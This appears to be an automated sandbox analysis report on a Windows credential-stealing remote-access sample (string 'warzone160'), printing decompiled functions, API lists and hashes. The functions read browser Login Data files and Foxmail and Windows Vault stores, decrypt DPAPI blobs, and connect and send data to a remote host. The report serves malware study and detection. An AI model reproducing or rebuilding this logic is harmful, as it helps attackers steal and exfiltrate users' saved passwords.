Function 004057FB, Relevance: 9.1, APIs: 6, Instructions: 75
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004057FB(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx; // executed
				E00403125(__ecx,  &_a4); // executed
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0041026F(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0); // executed
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10); // executed
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				L00405EA5(_a4);
				return _t53;
			}

0x00405801
0x0040580c
0x0040580e
0x0040581c
0x0040581f
0x00405826
0x0040582c
0x00405831
0x00405839
0x00405844
0x00405845
0x00405848
0x00405850
0x004058af
0x004058af
0x00405852
0x0040585a
0x0040585d
0x0040585f
0x00405865
0x0040586b
0x00000000
0x0040586d
0x00405870
0x00405878
0x0040587e
0x00405882
0x00405885
0x0040588e
0x00405895
0x004058a1
0x004058aa
0x004058c8
0x004058cb
0x004058ac
0x004058ac
0x00000000
0x004058ac
0x004058aa
0x0040586b
0x004058b4
0x004058bf

APIs

Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,74B60770,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151

Part of subcall function 0041026F: WaitForSingleObject.KERNEL32(?,000000FF,00405824,74B60770,?,?,00000000,00404EA0,?,?,?,?,?,00000000,74B60770), ref: 00410273

getaddrinfo.WS2_32(74B60770,00000000,00404EA0,00000000), ref: 00405848
socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
htons.WS2_32(00000000), ref: 00405885
freeaddrinfo.WS2_32(00000000), ref: 00405895
connect.WS2_32(?,?,00000010), ref: 004058A1
ReleaseMutex.KERNEL32(?), ref: 004058CB

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
String ID:
API String ID: 2516106447-0
Opcode ID: f7dbb7a0d36307059b1ae60a9f8b047b449f289729a674a0c6f96048248c16a4
Instruction ID: 092a2e84de4c1a6289be47cc7bce06a374af0b8a9768fb0cb1c663c0770c8cb0
Opcode Fuzzy Hash: f7dbb7a0d36307059b1ae60a9f8b047b449f289729a674a0c6f96048248c16a4
Instruction Fuzzy Hash: 77215C72A00208ABDF109F61D889BDABBB9FF84320F108066FD15EB291D7759A45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA8, Relevance: 9.1, APIs: 6, Instructions: 73
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040CBA8(WCHAR* __ecx, void** __edx, long* _a4) {
				void** _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				void* _t12;
				long* _t14;
				long _t16;
				void* _t17;
				int _t18;
				long* _t24;
				void* _t32;
				struct _OVERLAPPED* _t34;
				void* _t36;

				_t34 = 0;
				_v8 = __edx;
				_t36 =  *0x4197ac - _t34; // 0x0
				if(_t36 == 0) {
					_t12 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0); // executed
					_t32 = _t12;
					if(_t32 != 0 && _t32 != 0xffffffff) {
						_t14 =  &_v20;
						__imp__GetFileSizeEx(_t32, _t14);
						if(_t14 != 0 && _v16 == 0) {
							_t16 = _v20;
							_t24 = _a4;
							 *_t24 = _t16;
							_t17 = LocalAlloc(0x40, _t16);
							 *_v8 = _t17;
							if(_t17 != 0) {
								_t18 = ReadFile(_t32, _t17,  *_t24,  &_v12, 0); // executed
								if(_t18 == 0 ||  *_t24 != _v12) {
									LocalFree( *_v8);
								} else {
									_t34 = 1;
								}
							}
						}
						FindCloseChangeNotification(_t32); // executed
					}
				} else {
					_t34 = E0040CC54(__ecx, __edx, _a4);
				}
				return _t34;
			}

0x0040cbaf
0x0040cbb3
0x0040cbb6
0x0040cbbc
0x0040cbdc
0x0040cbe2
0x0040cbe6
0x0040cbed
0x0040cbf2
0x0040cbfa
0x0040cc01
0x0040cc05
0x0040cc0b
0x0040cc0d
0x0040cc16
0x0040cc1a
0x0040cc25
0x0040cc2d
0x0040cc40
0x0040cc36
0x0040cc38
0x0040cc38
0x0040cc2d
0x0040cc46
0x0040cc48
0x0040cc48
0x0040cbbe
0x0040cbc7
0x0040cbc7
0x0040cc53

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040CBDC
GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040C245), ref: 0040CBF2
LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040CC0D
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 0040CC25
FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040C245,\Google\Chrome\User Data\Default\Login Data), ref: 0040CC48

Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
Part of subcall function 0040CC54: LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
Part of subcall function 0040CC54: LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileLocal$AllocBinaryCryptString$ChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 3385914018-0
Opcode ID: df01472236ee6032e96d6ade989c194721901d55c1eac9900e64c9783ae2a0e0
Instruction ID: 745445a8a1a410ce86548f79becf7b71122546dbf84d59e0bf673223a6bc5152
Opcode Fuzzy Hash: df01472236ee6032e96d6ade989c194721901d55c1eac9900e64c9783ae2a0e0
Instruction Fuzzy Hash: 9F11C371600114FBEB259BA9DCC4EAFBBB8EF45750B00827AF909E6294D7349D41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409D9A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D9A(void* __ecx) {
				int _v8;
				void* _v12;
				long _t6;
				void* _t7;

				_t6 = RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12); // executed
				if(_t6 != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x4197b0,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x4197b0);
						_t7 = 1;
					}
				}
				return _t7;
			}

0x00409db5
0x00409dbd
0x00409df1
0x00409df1
0x00409dbf
0x00409dc2
0x00409de4
0x00000000
0x00409de6
0x00409de7
0x00409ded
0x00409ded
0x00409de4
0x00409df5

APIs

RegOpenKeyExA.KERNEL32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,00000000,?,?,?,?,00409F7B,?,00000000,?,0040C401,?), ref: 00409DB5
RegQueryValueExA.ADVAPI32(00000000,Executable,00000000,00000000,004197B0,?,?,?,?,?,00409F7B,?,00000000,?,0040C401,?), ref: 00409DDC
PathRemoveFileSpecA.SHLWAPI(004197B0,?,?,?,?,00409F7B,?,00000000,?,0040C401,?,?,00000000,?,\CentBrowser\User Data\Default\Login Data,\CentBrowser\User Data\Local State), ref: 00409DE7

Strings

Executable, xrefs: 00409DD4
software\Aerofox\FoxmailPreview, xrefs: 00409DAB

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOpenPathQueryRemoveSpecValue
String ID: Executable$software\Aerofox\FoxmailPreview
API String ID: 3687894118-2371247776
Opcode ID: 28ba990561e6b3eb0aeea4ee47ce201ab51b9c295677a5cf9b519593c38b6ce1
Instruction ID: 0bac63cb233140f308035db5f7d86828bf01501f6a5ebf857ff9987f94d08bec
Opcode Fuzzy Hash: 28ba990561e6b3eb0aeea4ee47ce201ab51b9c295677a5cf9b519593c38b6ce1
Instruction Fuzzy Hash: 6EF08274284204FFEB108B51DD8AFDA7BBCDB85B44F104066F901F21C1D3B49941A518

Uniqueness

Uniqueness Score: -1.00%

Function 046DA880, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 430COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046DA8B9

Part of subcall function 046B1120: _memset.LIBCMT ref: 046B116B

Strings

database schema is locked: %s, xrefs: 046DA98A
statement too long, xrefs: 046DA931
(, xrefs: 046DAC04

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: ($database schema is locked: %s$statement too long
API String ID: 2102423945-3861767200
Opcode ID: e491fce248e9e8aa6e89e433d6599fea063e0926cf8c6988eb212fd5ee3935c0
Instruction ID: 9fbd5e40e0a5c42acecd24d4de67ee37e2faf84fc5e9e148a62722189f8b803f
Opcode Fuzzy Hash: e491fce248e9e8aa6e89e433d6599fea063e0926cf8c6988eb212fd5ee3935c0
Instruction Fuzzy Hash: 77F1D5B0A083019FD724CF68D880B6AB7E5BF94318F08466DE88A9B341F775F945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0469E600, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469E724
_memset.LIBCMT ref: 0469E8CC

Strings

(, xrefs: 0469E647
-journal, xrefs: 0469E78C

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: ($-journal
API String ID: 2102423945-1587918665
Opcode ID: 78b97e43ba7472e872604a900ee3f9d006a58c7122ba9ebbedaddae05881ec08
Instruction ID: a1b19d919791c674607fb127fb2e6e8238392b4cca587a70f9fd8b87c03b66b1
Opcode Fuzzy Hash: 78b97e43ba7472e872604a900ee3f9d006a58c7122ba9ebbedaddae05881ec08
Instruction Fuzzy Hash: 02C1D0B1A007059BDB20CF68C88079BBBE9BF45314F18856DD8A98B381E776F945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 046A4DF0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 283COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A4F94

Part of subcall function 0469D4E0: _memset.LIBCMT ref: 0469D514

Strings

SQLite format 3, xrefs: 046A4F6F
database corruption at line %d of [%.10s], xrefs: 046A4E6B
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A4E61

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: SQLite format 3$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-3910250768
Opcode ID: a50f4b09cd8d3defeb18bc016caa926c2e1094a05ee24bea62b375a90fbb7c4a
Instruction ID: 971df9c7fe2f5d8b0d6501997e3dec3a63f684e22db2d78f0adfa1521d3d0073
Opcode Fuzzy Hash: a50f4b09cd8d3defeb18bc016caa926c2e1094a05ee24bea62b375a90fbb7c4a
Instruction Fuzzy Hash: 19B1ADB0A086519FDB14CF28C48061ABBE5BF84318F148A5DE8998B345E7B1FC64CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 0040B203, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040B203(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0040B559(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x419140); // executed
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0040B526(_t240);
									_push(0x10);
									_push(0x419130);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E00401000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E004035E5( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E00403248( &_v32, E004035E5( &_v64, L"Internet Explorer"));
											L00405EA5(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x417580]");
												asm("movups [ebp-0x60], xmm0");
												E00403437( &_v100, E004035E5( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												L00405EA5(_v68);
												_v68 = _t234;
												E00403437( &_v96, E004035E5( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												L00405EA5(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E00403437( &_v84, E004035E5( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													L00405EA5(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												L00401F95(_t235,  &_v100);
												L00401FCB(_t186);
												E004013EF( &_v100);
											}
											L00405EA5(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E00401000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E004035E5( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E00403248( &_v24, E004035E5( &_v48, L"Internet Explorer"));
											L00405EA5(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x417580]");
												asm("movups [ebp-0x60], xmm0");
												E00403437( &_v100, E004035E5( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												L00405EA5(_v52);
												_v52 = _t234;
												E00403437( &_v96, E004035E5( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												L00405EA5(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E00403437( &_v92, E004035E5( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													L00405EA5(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												L00401F95(_t235,  &_v100);
												L00401FCB(_t186);
												E004013EF( &_v100);
											}
											L00405EA5(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0)); // executed
				L00405EA5(_t234);
				L00405EA5(0);
				return L00405EA5(0);
			}

0x0040b20b
0x0040b20d
0x0040b210
0x0040b212
0x0040b215
0x0040b218
0x0040b21b
0x0040b21e
0x0040b221
0x0040b22b
0x0040b234
0x0040b235
0x0040b236
0x0040b243
0x0040b24c
0x0040b250
0x0040b251
0x0040b256
0x0040b261
0x0040b26a
0x0040b26c
0x0040b272
0x0040b275
0x0040b278
0x0040b27b
0x0040b27b
0x0040b280
0x0040b282
0x0040b289
0x0040b3ad
0x0040b3ae
0x0040b3b1
0x0040b3b6
0x0040b3b9
0x0040b3bb
0x0040b3ca
0x0040b3e0
0x0040b3ea
0x0040b3ef
0x0040b3f2
0x0040b3f4
0x0040b400
0x0040b407
0x0040b41b
0x0040b423
0x0040b431
0x0040b43e
0x0040b446
0x0040b44e
0x0040b452
0x0040b45b
0x0040b465
0x0040b46b
0x0040b46d
0x0040b478
0x0040b47e
0x0040b48b
0x0040b493
0x0040b498
0x0040b498
0x0040b49b
0x0040b4a4
0x0040b4ab
0x0040b4b3
0x0040b4b3
0x0040b4bb
0x0040b4c0
0x00000000
0x0040b4c0
0x0040b28f
0x0040b292
0x0040b295
0x0040b296
0x0040b299
0x0040b29e
0x0040b2a3
0x0040b2af
0x0040b2c5
0x0040b2cf
0x0040b2d4
0x0040b2d9
0x0040b2df
0x0040b2e5
0x0040b2ec
0x0040b300
0x0040b308
0x0040b316
0x0040b323
0x0040b32b
0x0040b333
0x0040b336
0x0040b337
0x0040b338
0x0040b339
0x0040b33a
0x0040b33d
0x0040b340
0x0040b343
0x0040b344
0x0040b34f
0x0040b357
0x0040b36a
0x0040b372
0x0040b377
0x0040b377
0x0040b37a
0x0040b383
0x0040b38a
0x0040b392
0x0040b392
0x0040b39a
0x0040b39f
0x0040b4c3
0x0040b4c3
0x0040b4c3
0x0040b2a3
0x0040b4c9
0x0040b4cd
0x0040b4ce
0x0040b4d2
0x0040b4d5
0x0040b4de
0x0040b4de
0x0040b26c
0x0040b261
0x0040b243
0x0040b4e5
0x0040b4ea
0x0040b4ea
0x0040b4f4
0x0040b4fa
0x0040b4fa
0x0040b506
0x0040b50e
0x0040b515
0x0040b525

APIs

Part of subcall function 0040B559: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040B229,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000,00000000,00000007,\Epic Privacy Browser\User Data\Default\Login Data,\Epic Privacy Browser\User Data\Local State), ref: 0040B561

FreeLibrary.KERNEL32(?,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000,00000000,00000007,\Epic Privacy Browser\User Data\Default\Login Data,\Epic Privacy Browser\User Data\Local State,00000000,00000000), ref: 0040B506

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403248: lstrcmpW.KERNEL32(?,?,?,0040B3E5,00000000,Internet Explorer,?,?,00000000,?,00000000,00000001,00000008,\Microsoft\Edge\User Data\Default\Login Data,\Microsoft\Edge\User Data\Local State,00000000), ref: 00403252

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Strings

4, xrefs: 0040B4CE
Internet Explorer, xrefs: 0040B2B4, 0040B3CF
8, xrefs: 0040B4C9

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrarylstrlen$DispatcherExceptionLoadUserVirtuallstrcmplstrcpy
String ID: 4$8$Internet Explorer
API String ID: 2576498667-747916358
Opcode ID: 8cf7bc3652d9b76ebebc0501662707954881e7c6c91cbb44a63feb6bf41fa707
Instruction ID: b6cee262d57798efbd2936ca721335ce7e6008c0fa62be54d2cf6ef3d4be9e9b
Opcode Fuzzy Hash: 8cf7bc3652d9b76ebebc0501662707954881e7c6c91cbb44a63feb6bf41fa707
Instruction Fuzzy Hash: D4A12371D00219ABDF15EFA6CC859DEBB79FF44708F10402AF405B7291EB38AA45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004055A5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004055A5(void* __ecx, void* __edx, char _a4) {
				char _v12;
				char _v16;
				char _v24;
				void* _t15;
				void* _t21;
				void* _t38;
				intOrPtr _t39;
				void* _t40;

				_t37 = __edx;
				_t38 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
					_t2 =  &_v12; // 0x404f49, executed
					_t15 = E004033BF(_t2, "warzone160"); // executed
					E00403003( &_v24, __edx, _t15);
					_t4 =  &_v12; // 0x404f49
					_t31 =  *_t4;
					L00405EA5( *_t4);
					_t5 =  &_a4; // 0x404f49
					_t39 =  *_t5;
					_t32 = _t40;
					E0040304C(_t40, _t39);
					E0040304C(_t40,  &_v24);
					_t21 = E004060AA( &_v16, _t37, _t40, _t32,  *_t4, _t31);
					__imp__#19( *((intOrPtr*)(_t38 + 0xc)), _v16,  *((intOrPtr*)(_t39 + 4)), 0); // executed
					E00403036( &_v16);
					E00403036( &_v24);
					return 0 | _t21 != 0xffffffff;
				}
				return 0;
			}

0x004055a5
0x004055ae
0x004055b4
0x004055bf
0x004055c2
0x004055cb
0x004055d0
0x004055d0
0x004055d3
0x004055d8
0x004055d8
0x004055dd
0x004055e0
0x004055ed
0x004055f5
0x00405608
0x00405619
0x00405621
0x00000000
0x00405626
0x00000000

APIs

send.WS2_32(000000FF,?,?,00000000), ref: 00405608

Strings

warzone160, xrefs: 004055BA
IO@, xrefs: 004055D8, 004055DF
IO@, xrefs: 004055BF, 004055D0

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: send
String ID: IO@$IO@$warzone160
API String ID: 2809346765-1098257422
Opcode ID: 19994bfbc80aa940fc6b12361bd9759b99f1e95e16f71591fe19c522a773a668
Instruction ID: c1e0b2cfaea86d07842ac6dd019f160f43f9bd064c1ea9b5a9466f7d64858a70
Opcode Fuzzy Hash: 19994bfbc80aa940fc6b12361bd9759b99f1e95e16f71591fe19c522a773a668
Instruction Fuzzy Hash: 65018471901008BBDB04EBA5DC42CDEBB6DDF50365B50423EF122721D1EB79AB158AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE2, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E00405D70();
					E00405D9D(0x419000, 0x41902c);
					GetModuleHandleA(0);
					_t11 = E00413435( *_t2, 0x419000, 0x419000); // executed
					E00405D85();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}

0x00405cef
0x00405cf1
0x00405cf5
0x00405d1f
0x00405d1f
0x00405d21
0x00000000
0x00000000
0x00405d1c
0x00405d1c
0x00405d1d
0x00405d1d
0x00405d2c
0x00405d2e
0x00405d25
0x00405d27
0x00000000
0x00000000
0x00405d29
0x00405d29
0x00405d2a
0x00405d2a
0x00000000
0x00405d2a
0x00405d30
0x00405d30
0x00405d30
0x00405d38
0x00405d3e
0x00405d4d
0x00405d54
0x00405d5c
0x00405d63
0x00405d69
0x00405d69
0x00405cf7
0x00405cf8
0x00405cfc
0x00405d0f
0x00405d0f
0x00405d15
0x00405d18
0x00000000
0x00405d18
0x00405cfe
0x00405d00
0x00405d00
0x00405d04
0x00000000
0x00000000
0x00405d06
0x00405d07
0x00405d09
0x00405d0d
0x00000000
0x00000000
0x00000000
0x00405d0d
0x00000000

APIs

GetCommandLineA.KERNEL32 ref: 00405CE9
GetStartupInfoA.KERNEL32(?), ref: 00405D38
GetModuleHandleA.KERNEL32(00000000), ref: 00405D54
ExitProcess.KERNEL32 ref: 00405D69

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: eacdaa668cf48abf2a89799ff968949de2d2c2fd9d0224425ece3e2bc3c99383
Instruction ID: b91b949f87cc3387e5335cb440a95d827ed93168e94d9b44a33dce71b5c9a03c
Opcode Fuzzy Hash: eacdaa668cf48abf2a89799ff968949de2d2c2fd9d0224425ece3e2bc3c99383
Instruction Fuzzy Hash: 700108341045442ED7242F74B44D6EB3B66DF56308B64907BE482A7292DA3E0C478E6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F2, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040C9F2(intOrPtr __ecx, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				void* _t19;
				void* _t22;
				void* _t24;
				void* _t34;
				void* _t35;

				_t35 = 0; // executed
				_t16 = E0040CC54(__ecx,  &_v12,  &_v8); // executed
				_pop(_t26);
				if(_t16 == 0) {
					L8:
					return _t35;
				}
				_t34 = _v12;
				if(_v8 >= 5) {
					_t19 = E00401000(_t34, "DPAPI", 5);
					_t42 = _t19;
					if(_t19 == 0) {
						_push( &_v16);
						_push( &_v12);
						_t22 = E0040CA78(_t34 + 5, _v8 - 5, _t42); // executed
						if(_t22 != 0) {
							if(_v16 == 0x20) {
								_t24 = E0040CCB4(_t22, _v12, _a8, _a12); // executed
								_t35 = _t24;
							}
							LocalFree(_v12);
						}
					}
				}
				LocalFree(_t34);
				goto L8;
			}

0x0040ca01
0x0040ca03
0x0040ca08
0x0040ca0b
0x0040ca73
0x0040ca77
0x0040ca77
0x0040ca11
0x0040ca14
0x0040ca1e
0x0040ca26
0x0040ca28
0x0040ca31
0x0040ca35
0x0040ca3f
0x0040ca49
0x0040ca4f
0x0040ca5a
0x0040ca60
0x0040ca60
0x0040ca65
0x0040ca65
0x0040ca49
0x0040ca28
0x0040ca6c
0x00000000

APIs

